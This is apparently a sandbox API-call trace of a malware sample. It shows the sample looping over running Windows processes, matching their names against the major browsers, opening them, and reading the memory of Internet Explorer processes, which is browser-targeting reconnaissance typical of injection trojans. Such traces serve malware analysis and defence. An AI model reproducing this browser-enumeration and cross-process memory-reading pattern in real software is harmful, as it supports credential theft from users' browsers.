	[0209.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.271] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0209.271] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.271] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.272] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0209.272] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.272] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.273] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0209.274] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x3378
	[0209.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.274] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0209.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.274] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.274] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.274] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0209.275] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.275] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.275] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0209.276] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x337c
	[0209.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0209.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.276] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.276] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0209.277] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.277] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.277] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0209.278] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x3380
	[0209.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0209.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.278] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.278] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0209.279] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.279] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.279] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0209.280] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x3384
	[0209.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.280] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0209.280] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.280] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.281] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0209.281] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.281] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.282] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0209.282] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x3388
	[0209.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.283] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0209.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.283] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.283] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0209.283] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.283] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.284] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0209.284] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x338c
	[0209.284] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.284] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0209.285] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.285] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.286] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0209.286] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.286] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.287] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0209.287] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x3390
	[0209.287] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.287] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0209.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.288] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.288] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.288] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0209.289] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.289] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.289] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0209.290] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x3394
	[0209.290] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.291] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0209.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.291] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.291] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0209.291] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.292] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.292] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0209.292] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x3398
	[0209.292] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.292] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0209.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.293] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.293] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0209.293] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.293] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.293] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0209.294] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x339c
	[0209.294] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.294] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0209.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.295] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.295] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.295] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0209.296] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.296] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.296] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0209.297] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x33a0
	[0209.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.297] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0209.297] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.297] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.298] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.298] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0209.299] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.299] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.299] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0209.300] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x33a4
	[0209.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.300] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0209.300] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.300] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.301] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0209.301] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.301] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.302] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0209.302] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x33a8
	[0209.302] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.302] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0209.303] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.303] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.304] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0209.304] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.304] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.305] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0209.306] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x33ac
	[0209.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.306] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0209.306] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.306] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.307] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0209.307] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.307] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.308] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.308] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x33b0
	[0209.308] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.308] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.309] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.309] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.310] NtQueryInformationProcess (in: ProcessHandle=0x33b0, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.310] ReadProcessMemory (in: hProcess=0x33b0, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.310] ReadProcessMemory (in: hProcess=0x33b0, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.310] ReadProcessMemory (in: hProcess=0x33b0, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.310] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.310] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0209.311] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x33b4
	[0209.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0209.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0209.311] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.311] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0209.312] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.312] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.312] NtQueryInformationProcess (in: ProcessHandle=0x33b4, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0209.312] ReadProcessMemory (in: hProcess=0x33b4, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0209.312] ReadProcessMemory (in: hProcess=0x33b4, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0209.312] ReadProcessMemory (in: hProcess=0x33b4, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0209.312] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0209.312] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0209.313] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x33b8
	[0209.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.313] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0209.313] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0209.314] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.314] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.314] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0209.315] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x33bc
	[0209.315] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.315] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0209.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0209.316] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.316] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.316] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.317] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x33c0
	[0209.317] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.317] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.318] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.318] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.318] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.318] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.318] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.319] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0209.320] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x33c4
	[0209.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.320] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0209.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.320] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.320] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.320] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0209.321] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.321] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0209.321] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0209.322] CloseHandle (hObject=0x188) returned 1
	[0209.322] Sleep (dwMilliseconds=0x64) 
	[0209.431] GetCurrentProcessId () returned 0x110
	[0209.431] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x188
	[0209.433] Process32First (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0209.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0209.435] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0209.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x33c8
	[0209.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.435] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0209.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.436] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0209.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0209.436] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
